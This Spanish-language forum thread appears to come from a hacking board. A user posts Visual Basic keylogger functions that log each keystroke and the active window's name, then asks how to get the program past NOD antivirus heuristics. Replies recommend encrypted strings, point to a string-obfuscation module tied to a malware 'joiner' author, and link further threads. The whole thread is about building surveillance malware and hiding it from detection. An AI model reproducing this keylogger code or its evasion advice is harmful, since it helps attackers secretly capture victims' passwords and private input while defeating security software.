Hola... Postie algo parecido en Troyanos y Virus, pero aqui lo hare mas centrado en esta funcion...
Necesito que me confirmen....
Si en un Modulo tengo estas 2 funciones:
Public Function FireEvent(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String)
On Error Resume Next
If strInApplication = strLastApplication Then
Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, False
Else
Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, True
strLastApplication = strInApplication
End If
End Function
Public Function Tecla_Presionada(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String, ByVal vCambio_De_Aplicacion As Boolean)
If vCambio_De_Aplicacion Then
If Not FMain.txt.Text = "" Then
FMain.txt.Text = FMain.txt.Text & vbNewLine & vbNewLine
End If
FMain.txt.Text = FMain.txt.Text & "<hr><b>...:::." & Now & ":::...<br>" & strInApplication & "</b><hr><br>" & vbNewLine
If bIsFunctionKey Then
FMain.txt.Text = FMain.txt.Text & strKeyName
Else
FMain.txt.Text = FMain.txt.Text & Chr(intKey)
End If
Else
If bIsFunctionKey Then
FMain.txt.Text = FMain.txt.Text & strKeyName
Else
FMain.txt.Text = FMain.txt.Text & Chr(intKey)
End If
End If
End Function
Es detectada por la heuristica?
Se puede lograr meter alguna funcion dentro de otra? no verdad? :huh:
Esto ya me tiene desesperado, no logro burlar la heuristica del NOD!
Se que el problema esta ahi porque si quito alguna parte del code ya no es detectado el EXE pero queda inservible xD
Alguna recomendacion?
Saludos
No es esactamente meter una funcion dentro de otra, sino llamar a ejecucion desde una funcion A a otra funcion B.
Porsupuesto que se puede hacer.
En cuanto como se puede hacer indetectable, en el foro de troyanos y virus creo que te podran orientar mejor.
Una recomendacion, usa strings cifrados
Salu2
Sobre las strings cifradas, hay un post de Kizar, el del Astaroth Joiner que tiene un módulo con el algoritmo de Huffman.
Un saludo
Hace no mucho repondi esto mismo en otro post. Supongo que ahi podras informarte.
http://foro.elhacker.net/index.php/topic,126647.msg579870.html#msg579870
http://foro.elhacker.net/index.php/topic,129096.msg604114.html#msg604114